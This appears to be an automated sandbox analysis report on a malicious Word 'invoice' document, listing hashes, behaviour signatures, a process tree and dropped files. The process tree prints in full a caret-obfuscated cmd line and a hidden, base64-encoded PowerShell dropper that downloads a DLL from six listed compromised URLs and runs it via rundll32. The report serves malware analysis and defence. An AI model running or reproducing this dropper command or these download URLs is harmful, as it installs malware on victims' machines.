Analysis

  • max time kernel
    139s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    29-01-2021 04:03

General

  • Target

    송장-171827.doc

  • Size

    164KB

  • MD5

    cca2eb43e9ac9ce0b850601db0c8a9dd

  • SHA1

    1efa00d6971122dfe4e916282085e1e4ca0eeb86

  • SHA256

    b2de95f9cba002fd980b4edb6ca033c5c200f4f1cea9d7a7315cfa4801e514e0

  • SHA512

    1d3c28189386daaa494ab871c7a534b4054ddd3fb91a60a5baf8abc6c961fd34c880feac43b806bbb64fa46588faba5b6f2c15879d355b5d810b24d6b91e8005

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://qingniatouzi.com/wp-includes/Z4TFME0/

exe.dropper

http://chenqiaorong007.com/wp-content/inh1Q4eFMT/

exe.dropper

http://bestcartdeal.com/wp-content/U12BbGPx2v/

exe.dropper

https://hredoybangladesh.com/3948708181/l7/

exe.dropper

https://washcolsc.com/wp-admin/gRIWZ/

exe.dropper

https://aqnym.top/wp-login/9ZvtYaLyhg/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\송장-171827.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:796
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAVAAgACAAKAAnADcASQAnACsAJwAyAHEAVwAnACkAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsAMAB9AHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsANQB9ACIALQBGACAAJwBzAHkAcwBUACcALAAnAEUATQAuACcALAAnAGQAJwAsACcAaQBSAGUAJwAsACcASQBPAC4AJwAsACcAYwBUAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAUwBFAHQALQBJAFQAZQBtACAAIAB2AEEAUgBJAEEAYgBsAGUAOgA0ADUAeQBNAFcAcAAgACgAIAAgAFsAVAB5AFAAZQBdACgAIgB7ADQAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiAC0ARgAgACcAcwBFAHIAVgBpAEMAJwAsACcARQBSACcALAAnAEUAcABvAEkATgAnACwAJwBUAE0AYQBOAEEAZwAnACwAJwBTAHkAcwB0AEUATQAuAG4AZQBUACcALAAnAC4AJwApACAAKQA7ACAAIAAkAEgAdQA2AGMAZgB3ADIAPQAkAFkAOAA5AFIAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFUAOQA5AFoAOwAkAFgAMABfAFIAPQAoACcAWgAxACcAKwAnADQASQAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwARQAgACAAKAAnADcAaQAnACsAJwAyAHEAVwAnACkAIAAtAFYAYQBsACkAOgA6ACIAQwBSAEUAQQBgAFQARQBkAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB6ACcAKwAnAG0AOABEAGcAJwArACcAXwBqACcAKQArACgAJwBjADYAJwArACcAYQAnACkAKwAoACcAegBtADgAJwArACcATgAnACkAKwAoACcAZABxACcAKwAnAHgAdAAnACkAKwAoACcAaQAnACsAJwB1AHoAJwApACsAJwBtADgAJwApAC4AIgBSAGAARQBgAFAAbABhAGMARQAiACgAKAAnAHoAbQAnACsAJwA4ACcAKQAsAFsAcwB0AHIAaQBOAEcAXQBbAGMAaABBAFIAXQA5ADIAKQApACkAOwAkAEkAMwAwAFkAPQAoACcAWQAnACsAKAAnADYAJwArACcAXwBNACcAKQApADsAIAAgACQANAA1AFkATQBXAHAAOgA6ACIAUwBgAEUAQwBVAHIAaQBUAGAAeQBgAFAAcgBgAG8AdABvAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABTADEAXwBQAD0AKAAnAE0AMAAnACsAJwAyAEsAJwApADsAJABQADQAdwBzAGYAbQBxACAAPQAgACgAJwBLACcAKwAoACcAMwAnACsAJwA0AEoAJwApACkAOwAkAEUANAAwAEMAPQAoACcAUAAnACsAKAAnADMAMAAnACsAJwBQACcAKQApADsAJABTAGcAOQBoAG8ANQAyAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ARABnAF8AagAnACsAKAAnAGMAJwArACcANgBhACcAKQArACcAewAwAH0ATgBkACcAKwAoACcAcQAnACsAJwB4AHQAaQAnACkAKwAnAHUAJwArACcAewAwAH0AJwApACAAIAAtAGYAWwBDAEgAQQByAF0AOQAyACkAKwAkAFAANAB3AHMAZgBtAHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQAOQAwAEsAPQAoACgAJwBIADkAJwArACcANAAnACkAKwAnAEwAJwApADsAJABVAGoAZwBiAGMAOQBoAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAQgBrAGoAYgBxAGUAMQA9ACgAJwBzACcAKwAoACcAZwAgAHkAdwAgACcAKwAnAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAKAAnAC8AJwArACcAcQBpACcAKQArACcAbgBnACcAKwAoACcAbgBpACcAKwAnAGEAJwApACsAJwB0AG8AJwArACcAdQAnACsAKAAnAHoAaQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AJwApACsAJwBpACcAKwAoACcAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAvAFoANABUAEYATQBFADAALwAhAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIABhAGgAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGMAaABlACcAKwAnAG4AcQAnACkAKwAoACcAaQBhAG8AcgBvAG4AJwArACcAZwAwACcAKwAnADAAJwArACcANwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AJwArACcAdAAvAGkAbgAnACkAKwAoACcAaAAxAFEAJwArACcANABlACcAKQArACgAJwBGAE0AVAAnACsAJwAvACcAKQArACgAJwAhACcAKwAnAHMAZwAgACcAKwAnAHkAdwAgAGEAJwApACsAJwBoADoAJwArACgAJwAvAC8AYgAnACsAJwBlAHMAJwApACsAJwB0ACcAKwAnAGMAJwArACcAYQAnACsAKAAnAHIAJwArACcAdABkAGUAYQBsACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGMAJwArACgAJwBvAG4AdAAnACsAJwBlAG4AJwArACcAdAAvACcAKQArACgAJwBVADEAJwArACcAMgBCAGIAJwApACsAJwBHACcAKwAoACcAUAAnACsAJwB4ADIAdgAvACcAKwAnACEAcwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAJwArACcAaAAnACkAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAaAByACcAKwAnAGUAZAAnACkAKwAoACcAbwB5AGIAJwArACcAYQBuAGcAbAAnACkAKwAoACcAYQBkACcAKwAnAGUAcwAnACkAKwAnAGgALgAnACsAKAAnAGMAbwAnACsAJwBtAC8AMwAnACkAKwAoACcAOQA0ACcAKwAnADgANwAwACcAKQArACcAOAAxACcAKwAnADgAMQAnACsAJwAvACcAKwAoACcAbAA3AC8AIQBzACcAKwAnAGcAIAAnACsAJwB5ACcAKQArACgAJwB3ACAAYQBoAHMAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAHcAYQAnACkAKwAnAHMAJwArACcAaABjACcAKwAoACcAbwBsACcAKwAnAHMAYwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAnACkAKwAoACcALQBhAGQAbQBpACcAKwAnAG4ALwAnACsAJwBnACcAKQArACcAUgAnACsAKAAnAEkAVwBaACcAKwAnAC8AIQBzAGcAJwApACsAKAAnACAAJwArACcAeQB3ACAAYQBoAHMAOgAnACsAJwAvAC8AJwApACsAJwBhAHEAJwArACgAJwBuAHkAJwArACcAbQAuACcAKQArACgAJwB0AG8AcAAvACcAKwAnAHcAJwArACcAcAAtACcAKQArACgAJwBsACcAKwAnAG8AJwArACcAZwBpAG4ALwAnACkAKwAoACcAOQAnACsAJwBaAHYAdAAnACkAKwAoACcAWQAnACsAJwBhAEwAeQBoACcAKQArACcAZwAvACcAKQAuACIAUgBFAHAAbABgAEEAYABjAEUAIgAoACgAKAAnAHMAZwAgAHkAJwArACcAdwAnACkAKwAnACAAYQAnACsAJwBoACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVQBqAGcAYgBjADkAaAAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAGAAcABMAEkAdAAiACgAJABWADAANQBPACAAKwAgACQASAB1ADYAYwBmAHcAMgAgACsAIAAkAEUAXwAwAFoAKQA7ACQARABfADYAWgA9ACgAJwBRADgAJwArACcAMABBACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABvAHcAdQA4AGQANgAgAGkAbgAgACQAQgBrAGoAYgBxAGUAMQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAdABlAG0ALgBOAEUAdAAuAHcARQBiAEMATABJAGUAbgBUACkALgAiAEQAYABvAFcAbgBsAGAAbwBhAGQAZgBJAGwARQAiACgAJABQAG8AdwB1ADgAZAA2ACwAIAAkAFMAZwA5AGgAbwA1ADIAKQA7ACQATgAzADUAUgA9ACgAJwBSAF8AJwArACcAOABMACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAGcAOQBoAG8ANQAyACkALgAiAGwARQBgAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADEAMQA0ADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUwBnADkAaABvADUAMgAsACgAKAAnAEEAbgB5AFMAJwArACcAdAAnACkAKwAnAHIAJwArACgAJwBpAG4AJwArACcAZwAnACkAKQAuACIAdABgAE8AcwB0AHIAaQBuAGcAIgAoACkAOwAkAFcAMAA1AEMAPQAoACgAJwBYADQAJwArACcANwAnACkAKwAnAEgAJwApADsAYgByAGUAYQBrADsAJABIADAAMQBVAD0AKAAnAEkAMAAnACsAJwA1AEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADQANgBMAD0AKAAnAEwAOAAnACsAJwAzAFcAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABzAEUAVAAgACAAKAAnADcASQAnACsAJwAyAHEAVwAnACkAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsAMAB9AHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsANQB9ACIALQBGACAAJwBzAHkAcwBUACcALAAnAEUATQAuACcALAAnAGQAJwAsACcAaQBSAGUAJwAsACcASQBPAC4AJwAsACcAYwBUAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAUwBFAHQALQBJAFQAZQBtACAAIAB2AEEAUgBJAEEAYgBsAGUAOgA0ADUAeQBNAFcAcAAgACgAIAAgAFsAVAB5AFAAZQBdACgAIgB7ADQAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiAC0ARgAgACcAcwBFAHIAVgBpAEMAJwAsACcARQBSACcALAAnAEUAcABvAEkATgAnACwAJwBUAE0AYQBOAEEAZwAnACwAJwBTAHkAcwB0AEUATQAuAG4AZQBUACcALAAnAC4AJwApACAAKQA7ACAAIAAkAEgAdQA2AGMAZgB3ADIAPQAkAFkAOAA5AFIAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFUAOQA5AFoAOwAkAFgAMABfAFIAPQAoACcAWgAxACcAKwAnADQASQAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwARQAgACAAKAAnADcAaQAnACsAJwAyAHEAVwAnACkAIAAtAFYAYQBsACkAOgA6ACIAQwBSAEUAQQBgAFQARQBkAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB6ACcAKwAnAG0AOABEAGcAJwArACcAXwBqACcAKQArACgAJwBjADYAJwArACcAYQAnACkAKwAoACcAegBtADgAJwArACcATgAnACkAKwAoACcAZABxACcAKwAnAHgAdAAnACkAKwAoACcAaQAnACsAJwB1AHoAJwApACsAJwBtADgAJwApAC4AIgBSAGAARQBgAFAAbABhAGMARQAiACgAKAAnAHoAbQAnACsAJwA4ACcAKQAsAFsAcwB0AHIAaQBOAEcAXQBbAGMAaABBAFIAXQA5ADIAKQApACkAOwAkAEkAMwAwAFkAPQAoACcAWQAnACsAKAAnADYAJwArACcAXwBNACcAKQApADsAIAAgACQANAA1AFkATQBXAHAAOgA6ACIAUwBgAEUAQwBVAHIAaQBUAGAAeQBgAFAAcgBgAG8AdABvAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABTADEAXwBQAD0AKAAnAE0AMAAnACsAJwAyAEsAJwApADsAJABQADQAdwBzAGYAbQBxACAAPQAgACgAJwBLACcAKwAoACcAMwAnACsAJwA0AEoAJwApACkAOwAkAEUANAAwAEMAPQAoACcAUAAnACsAKAAnADMAMAAnACsAJwBQACcAKQApADsAJABTAGcAOQBoAG8ANQAyAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ARABnAF8AagAnACsAKAAnAGMAJwArACcANgBhACcAKQArACcAewAwAH0ATgBkACcAKwAoACcAcQAnACsAJwB4AHQAaQAnACkAKwAnAHUAJwArACcAewAwAH0AJwApACAAIAAtAGYAWwBDAEgAQQByAF0AOQAyACkAKwAkAFAANAB3AHMAZgBtAHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQAOQAwAEsAPQAoACgAJwBIADkAJwArACcANAAnACkAKwAnAEwAJwApADsAJABVAGoAZwBiAGMAOQBoAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQAQgBrAGoAYgBxAGUAMQA9ACgAJwBzACcAKwAoACcAZwAgAHkAdwAgACcAKwAnAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAKAAnAC8AJwArACcAcQBpACcAKQArACcAbgBnACcAKwAoACcAbgBpACcAKwAnAGEAJwApACsAJwB0AG8AJwArACcAdQAnACsAKAAnAHoAaQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AJwApACsAJwBpACcAKwAoACcAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAvAFoANABUAEYATQBFADAALwAhAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIABhAGgAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGMAaABlACcAKwAnAG4AcQAnACkAKwAoACcAaQBhAG8AcgBvAG4AJwArACcAZwAwACcAKwAnADAAJwArACcANwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AJwArACcAdAAvAGkAbgAnACkAKwAoACcAaAAxAFEAJwArACcANABlACcAKQArACgAJwBGAE0AVAAnACsAJwAvACcAKQArACgAJwAhACcAKwAnAHMAZwAgACcAKwAnAHkAdwAgAGEAJwApACsAJwBoADoAJwArACgAJwAvAC8AYgAnACsAJwBlAHMAJwApACsAJwB0ACcAKwAnAGMAJwArACcAYQAnACsAKAAnAHIAJwArACcAdABkAGUAYQBsACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGMAJwArACgAJwBvAG4AdAAnACsAJwBlAG4AJwArACcAdAAvACcAKQArACgAJwBVADEAJwArACcAMgBCAGIAJwApACsAJwBHACcAKwAoACcAUAAnACsAJwB4ADIAdgAvACcAKwAnACEAcwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAJwArACcAaAAnACkAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAaAByACcAKwAnAGUAZAAnACkAKwAoACcAbwB5AGIAJwArACcAYQBuAGcAbAAnACkAKwAoACcAYQBkACcAKwAnAGUAcwAnACkAKwAnAGgALgAnACsAKAAnAGMAbwAnACsAJwBtAC8AMwAnACkAKwAoACcAOQA0ACcAKwAnADgANwAwACcAKQArACcAOAAxACcAKwAnADgAMQAnACsAJwAvACcAKwAoACcAbAA3AC8AIQBzACcAKwAnAGcAIAAnACsAJwB5ACcAKQArACgAJwB3ACAAYQBoAHMAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAHcAYQAnACkAKwAnAHMAJwArACcAaABjACcAKwAoACcAbwBsACcAKwAnAHMAYwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAnACkAKwAoACcALQBhAGQAbQBpACcAKwAnAG4ALwAnACsAJwBnACcAKQArACcAUgAnACsAKAAnAEkAVwBaACcAKwAnAC8AIQBzAGcAJwApACsAKAAnACAAJwArACcAeQB3ACAAYQBoAHMAOgAnACsAJwAvAC8AJwApACsAJwBhAHEAJwArACgAJwBuAHkAJwArACcAbQAuACcAKQArACgAJwB0AG8AcAAvACcAKwAnAHcAJwArACcAcAAtACcAKQArACgAJwBsACcAKwAnAG8AJwArACcAZwBpAG4ALwAnACkAKwAoACcAOQAnACsAJwBaAHYAdAAnACkAKwAoACcAWQAnACsAJwBhAEwAeQBoACcAKQArACcAZwAvACcAKQAuACIAUgBFAHAAbABgAEEAYABjAEUAIgAoACgAKAAnAHMAZwAgAHkAJwArACcAdwAnACkAKwAnACAAYQAnACsAJwBoACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVQBqAGcAYgBjADkAaAAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAGAAcABMAEkAdAAiACgAJABWADAANQBPACAAKwAgACQASAB1ADYAYwBmAHcAMgAgACsAIAAkAEUAXwAwAFoAKQA7ACQARABfADYAWgA9ACgAJwBRADgAJwArACcAMABBACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABvAHcAdQA4AGQANgAgAGkAbgAgACQAQgBrAGoAYgBxAGUAMQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAUwB5AFMAdABlAG0ALgBOAEUAdAAuAHcARQBiAEMATABJAGUAbgBUACkALgAiAEQAYABvAFcAbgBsAGAAbwBhAGQAZgBJAGwARQAiACgAJABQAG8AdwB1ADgAZAA2ACwAIAAkAFMAZwA5AGgAbwA1ADIAKQA7ACQATgAzADUAUgA9ACgAJwBSAF8AJwArACcAOABMACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAGcAOQBoAG8ANQAyACkALgAiAGwARQBgAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADEAMQA0ADQAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUwBnADkAaABvADUAMgAsACgAKAAnAEEAbgB5AFMAJwArACcAdAAnACkAKwAnAHIAJwArACgAJwBpAG4AJwArACcAZwAnACkAKQAuACIAdABgAE8AcwB0AHIAaQBuAGcAIgAoACkAOwAkAFcAMAA1AEMAPQAoACgAJwBYADQAJwArACcANwAnACkAKwAnAEgAJwApADsAYgByAGUAYQBrADsAJABIADAAMQBVAD0AKAAnAEkAMAAnACsAJwA1AEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADQANgBMAD0AKAAnAEwAOAAnACsAJwAzAFcAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll,AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll,AnyString
            4⤵
            • Loads dropped DLL
            PID:3880

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
      MD5

      3e1249e4d0b0b61d493da93139b9f3a4

      SHA1

      82863b73820e293793dc90da9635c390fc928ef7

      SHA256

      03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

      SHA512

      4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

    • \Users\Admin\Dg_jc6a\Ndqxtiu\K34J.dll
      MD5

      3e1249e4d0b0b61d493da93139b9f3a4

      SHA1

      82863b73820e293793dc90da9635c390fc928ef7

      SHA256

      03ff40768f2c5dfb8c60c977b173ab72abc0932ccd13d139115bf7f0ddcdb323

      SHA512

      4cd7757a187ff99034347bd125e98170832e193ad13f63754f3ee1a159f0d72c59abcd2f9755869ce533c765b9664603c6c38961c49149ea042e7e6894a9aef6

    • memory/796-2-0x00007FF97B640000-0x00007FF97B650000-memory.dmp
      Filesize

      64KB

    • memory/796-3-0x00007FF97B640000-0x00007FF97B650000-memory.dmp
      Filesize

      64KB

    • memory/796-4-0x00007FF97B640000-0x00007FF97B650000-memory.dmp
      Filesize

      64KB

    • memory/796-5-0x00007FF97B640000-0x00007FF97B650000-memory.dmp
      Filesize

      64KB

    • memory/796-6-0x00007FF99AE40000-0x00007FF99B477000-memory.dmp
      Filesize

      6.2MB

    • memory/1328-10-0x0000024AA8B70000-0x0000024AA8B71000-memory.dmp
      Filesize

      4KB

    • memory/1328-9-0x00007FF994420000-0x00007FF994E0C000-memory.dmp
      Filesize

      9.9MB

    • memory/1328-11-0x0000024AA6EA0000-0x0000024AA6EA2000-memory.dmp
      Filesize

      8KB

    • memory/1328-12-0x0000024AA6EA3000-0x0000024AA6EA5000-memory.dmp
      Filesize

      8KB

    • memory/1328-13-0x0000024AC0FA0000-0x0000024AC0FA1000-memory.dmp
      Filesize

      4KB

    • memory/1328-14-0x0000024AA6EA6000-0x0000024AA6EA8000-memory.dmp
      Filesize

      8KB

    • memory/1328-8-0x0000000000000000-mapping.dmp
    • memory/1956-15-0x0000000000000000-mapping.dmp
    • memory/2240-7-0x0000000000000000-mapping.dmp
    • memory/3880-17-0x0000000000000000-mapping.dmp